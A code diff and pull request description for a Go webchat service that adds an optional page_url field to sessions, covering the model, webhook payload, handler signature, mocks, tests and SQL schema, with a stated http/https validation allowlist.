+**bin-dbscheme-manager:**
+- `bin-manager/main/versions/<new>_webchat_sessions_add_column_page_url.py`

--- a/bin-webchat-manager/models/session/field.go
+++ b/bin-webchat-manager/models/session/field.go
@@ -9,6 +9,7 @@ const (
 
 	FieldWidgetID Field = "widget_id"
 	FieldStatus   Field = "status"
+	FieldPageURL  Field = "page_url"
 
 	FieldActiveflowID Field = "activeflow_id"
 

--- a/bin-webchat-manager/models/session/session.go
+++ b/bin-webchat-manager/models/session/session.go
@@ -19,6 +19,15 @@ type Session struct {
 	WidgetID uuid.UUID `json:"widget_id,omitempty" db:"widget_id,uuid"`
 	Status   Status    `json:"status,omitempty" db:"status"`
 
+	// PageURL is the page the widget was embedded on when this Session was
+	// created, captured client-side from window.location.href at
+	// POST /webchat_sessions time. Best-effort: absent for pre-upgrade embed
+	// snippets and for sessions created via the admin/accesskey direct-create
+	// path (no browser page exists in that path). NEVER re-captured on
+	// mid-session navigation -- this is a session-creation-time fact, exactly
+	// like WidgetID.
+	PageURL string `json:"page_url,omitempty" db:"page_url"`
+
 	ActiveflowID uuid.UUID `json:"activeflow_id,omitempty" db:"activeflow_id,uuid"`
 
 	TMLastActivity *time.Time `json:"tm_last_activity,omitempty" db:"tm_last_activity"`

--- a/bin-webchat-manager/models/session/webhook.go
+++ b/bin-webchat-manager/models/session/webhook.go
@@ -15,6 +15,7 @@ type WebhookMessage struct {
 
 	WidgetID uuid.UUID `json:"widget_id"`
 	Status   Status    `json:"status"`
+	PageURL  string    `json:"page_url,omitempty"`
 
 	TMLastActivity *time.Time `json:"tm_last_activity,omitempty"`
 	TMCreate       *time.Time `json:"tm_create,omitempty"`
@@ -29,6 +30,7 @@ func (h *Session) ConvertWebhookMessage() *WebhookMessage {
 
 		WidgetID: h.WidgetID,
 		Status:   h.Status,
+		PageURL:  h.PageURL,
 
 		TMLastActivity: h.TMLastActivity,
 		TMCreate:       h.TMCreate,

--- a/bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go
+++ b/bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go
@@ -10,4 +10,5 @@ import (
 type V1DataSessionsPost struct {
 	CustomerID uuid.UUID `json:"customer_id,omitempty"`
 	WidgetID   uuid.UUID `json:"widget_id,omitempty"`
+	PageURL    string    `json:"page_url,omitempty"`
 }

--- a/bin-webchat-manager/pkg/listenhandler/v1_sessions.go
+++ b/bin-webchat-manager/pkg/listenhandler/v1_sessions.go
@@ -30,7 +30,7 @@ func (h *listenHandler) processV1SessionsPost(ctx context.Context, m *sock.Reque
 		return simpleResponse(400), nil
 	}
 
-	tmp, err := h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID)
+	tmp, err := h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID, req.PageURL)
 	if err != nil {
 		log.Errorf("Could not create the session. err: %v", err)
 		return errorResponse(err), nil

--- a/bin-webchat-manager/pkg/sessionhandler/create.go
+++ b/bin-webchat-manager/pkg/sessionhandler/create.go
@@ -26,7 +26,7 @@ import (
 // SessionFlowID-trigger failure, must NOT fail Session creation
 // itself -- both are best-effort (the Session row is already
 // committed by the time either is attempted).
-func (h *sessionHandler) Create(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*session.Session, error) {
+func (h *sessionHandler) Create(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID, pageURL string) (*session.Session, error) {
 	log := logrus.WithFields(logrus.Fields{
 		"func":        "Create",
 		"customer_id": customerID,
@@ -45,6 +45,7 @@ func (h *sessionHandler) Create(ctx context.Context, customerID uuid.UUID, widge
 
 		WidgetID: widgetID,
 		Status:   session.StatusActive,
+		PageURL:  pageURL,
 	}
 
 	if err := h.db.SessionCreate(ctx, s); err != nil {

--- a/bin-webchat-manager/pkg/sessionhandler/create_test.go
+++ b/bin-webchat-manager/pkg/sessionhandler/create_test.go
@@ -65,7 +65,7 @@ func Test_Create_NoSessionFlowConfigured(t *testing.T) {
 	// SessionUpdate expected -- their absence from the mock is
 	// enforced by gomock failing on any unexpected call.
 
-	res, err := h.Create(ctx, customerID, widgetID)
+	res, err := h.Create(ctx, customerID, widgetID, "")
 	if err != nil {
 		t.Fatalf("Wrong match. expect: ok, got: %v", err)
 	}
@@ -146,7 +146,7 @@ func Test_Create_SessionFlowConfigured_TriggersFlow(t *testing.T) {
 		session.FieldActiveflowID: cv.ID,
 	}).Return(nil)
 
-	res, err := h.Create(ctx, customerID, widgetID)
+	res, err := h.Create(ctx, customerID, widgetID, "")
 	if err != nil {
 		t.Fatalf("Wrong match. expect: ok, got: %v", err)
 	}
@@ -187,7 +187,7 @@ func Test_Create_WidgetFetchFails_SessionStillSucceeds(t *testing.T) {
 	mockDB.EXPECT().SessionGet(ctx, sessionID).Return(sess, nil)
 	mockWidget.EXPECT().Get(ctx, widgetID).Return(nil, dbhandler.ErrNotFound)
 
-	res, err := h.Create(ctx, customerID, widgetID)
+	res, err := h.Create(ctx, customerID, widgetID, "")
 	if err != nil {
 		t.Fatalf("Wrong match. expect: ok, got: %v", err)
 	}

--- a/bin-webchat-manager/pkg/sessionhandler/main.go
+++ b/bin-webchat-manager/pkg/sessionhandler/main.go
@@ -18,7 +18,7 @@ import (
 
 // SessionHandler interface
 type SessionHandler interface {
-	Create(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*session.Session, error)
+	Create(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID, pageURL string) (*session.Session, error)
 	Get(ctx context.Context, id uuid.UUID) (*session.Session, error)
 	List(ctx context.Context, size uint64, token string, filters map[session.Field]any) ([]*session.Session, error)
 	Delete(ctx context.Context, id uuid.UUID) (*session.Session, error)

--- a/bin-webchat-manager/pkg/sessionhandler/mock_main.go
+++ b/bin-webchat-manager/pkg/sessionhandler/mock_main.go
@@ -43,18 +43,18 @@ func (m *MockSessionHandler) EXPECT() *MockSessionHandlerMockRecorder {
 }
 
 // Create mocks base method.
-func (m *MockSessionHandler) Create(ctx context.Context, customerID, widgetID uuid.UUID) (*session.Session, error) {
+func (m *MockSessionHandler) Create(ctx context.Context, customerID, widgetID uuid.UUID, pageURL string) (*session.Session, error) {
 	m.ctrl.T.Helper()
-	ret := m.ctrl.Call(m, "Create", ctx, customerID, widgetID)
+	ret := m.ctrl.Call(m, "Create", ctx, customerID, widgetID, pageURL)
 	ret0, _ := ret[0].(*session.Session)
 	ret1, _ := ret[1].(error)
 	return ret0, ret1
 }
 
 // Create indicates an expected call of Create.
-func (mr *MockSessionHandlerMockRecorder) Create(ctx, customerID, widgetID any) *gomock.Call {
+func (mr *MockSessionHandlerMockRecorder) Create(ctx, customerID, widgetID, pageURL any) *gomock.Call {
 	mr.mock.ctrl.T.Helper()
-	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Create", reflect.TypeOf((*MockSessionHandler)(nil).Create), ctx, customerID, widgetID)
+	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "Create", reflect.TypeOf((*MockSessionHandler)(nil).Create), ctx, customerID, widgetID, pageURL)
 }
 
 // Delete mocks base method.

--- a/bin-webchat-manager/scripts/database_scripts_test/sessions.sql
+++ b/bin-webchat-manager/scripts/database_scripts_test/sessions.sql
@@ -6,6 +6,7 @@ create table webchat_sessions(
 
   status            varchar(16),
   activeflow_id     binary(16),
+  page_url          TEXT,
 
   tm_last_activity  datetime(6),
   tm_create         datetime(6),


### PR DESCRIPTION
Capture the page URL a webchat visitor's widget was embedded on at session-creation time and surface it to admins.

- bin-webchat-manager: Add PageURL to Session/Field/WebhookMessage, thread it through listenhandler/sessionhandler.Create, regenerate mocks, update SQL test schema
- bin-common-handler: Thread page_url through WebchatV1SessionCreate's RPC interface, implementation, and mock
- bin-openapi-manager: Add optional page_url (maxLength 2048) to the webchat session create request body and WebchatManagerSession response schema
- bin-api-manager: Accept page_url in PostWebchatSessions, add validatePageURL (length cap + http/https scheme allowlist, mirrors auth_delegate.go's validateDelegateReason pattern), regenerate mock, update RST docs
- bin-dbscheme-manager: Add Alembic migration for webchat_sessions.page_url column